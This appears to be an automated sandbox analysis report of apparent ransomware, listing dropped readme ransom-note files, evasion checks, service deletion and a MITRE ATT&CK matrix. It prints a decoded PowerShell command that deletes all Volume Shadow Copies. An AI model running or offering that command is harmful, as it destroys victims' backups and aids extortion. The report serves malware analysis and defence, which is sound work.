        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\pictures\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\public\videos\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\3d objects\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\contacts\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\downloads\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\favorites\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\links\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\music\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\onedrive\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\pictures\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\recent\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\saved games\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\searches\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\videos\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\afwaafrxko\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\aixacvybsb\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\bpmlnobvsb\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\dtbzgiooso\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\htagvdfuie\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\jsdngycowy\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\ltkmybseyz\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\mnulncriyc\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\mxpxcvpdvn\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\psamnljhzw\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\zsszyefymu\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\desktop\ztgjilhxqb\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\20200719\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\afwaafrxko\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\aixacvybsb\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\bpmlnobvsb\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\dtbzgiooso\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\htagvdfuie\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\jsdngycowy\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\ltkmybseyz\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\mnulncriyc\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\mxpxcvpdvn\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\psamnljhzw\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\zsszyefymu\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\documents\ztgjilhxqb\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile created: c:\users\user\favorites\links\3zvp3joi3-readme.txtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect sleep reduction / modificationsShow sources
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_0009559A0_2_0009559A
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000954F0 rdtsc 0_2_000954F0
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_00093839
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeWindow / User API: threadDelayed 10000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2072Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2180Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exe TID: 4664Thread sleep count: 10000 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep count: 2072 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1164Thread sleep count: 2180 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000970C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_000970C1
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00094FDB GetSystemInfo,0_2_00094FDB
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: F73BkMlJhw.exe, 00000000.00000002.863029088.0000000004330000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000954F0 rdtsc 0_2_000954F0
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00094C8C mov eax, dword ptr fs:[00000030h]0_2_00094C8C
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00094FF2 mov ecx, dword ptr fs:[00000030h]0_2_00094FF2
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00094409 HeapCreate,GetProcessHeap,0_2_00094409
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Encrypted powershell cmdline option foundShow sources
        Source: unknownProcess created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeProcess created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}Jump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe0_2_000945C2
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmpBinary or memory string: RProgram Managerm
        Source: F73BkMlJhw.exe, 00000000.00000002.862248702.0000000001950000.00000002.00000001.sdmp, unsecapp.exe, 00000003.00000002.862395778.0000020C81700000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_000946E2 cpuid 0_2_000946E2
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\F73BkMlJhw.exeCode function: 0_2_00094D32 GetUserNameW,0_2_00094D32

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Replication Through Removable Media1Windows Management Instrumentation1Modify Existing Service1Process Injection12Masquerading3Credential DumpingVirtualization/Sandbox Evasion2Replication Through Removable Media1Data from Local SystemData Encrypted1Standard Cryptographic Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
        Replication Through Removable MediaService Execution1Port MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion2Network SniffingProcess Discovery3Remote ServicesData from Removable MediaExfiltration Over Other Network MediumConnection Proxy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDefacement1
        External Remote ServicesPowerShell1Accessibility FeaturesPath InterceptionProcess Injection12Input CaptureApplication Window Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingDeobfuscate/Decode Files or Information1Credentials in FilesPeripheral Device Discovery11Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
        Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessConnection Proxy1Account ManipulationAccount Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceDLL Search Order HijackingBrute ForceSystem Owner/User Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
        Spearphishing AttachmentScriptingPath InterceptionScheduled TaskSoftware PackingTwo-Factor Authentication InterceptionSecurity Software Discovery121Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionIndicator BlockingBash HistorySystem Service Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptFile and Directory Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
        Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationScriptingKeychainSystem Information Discovery25Taint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.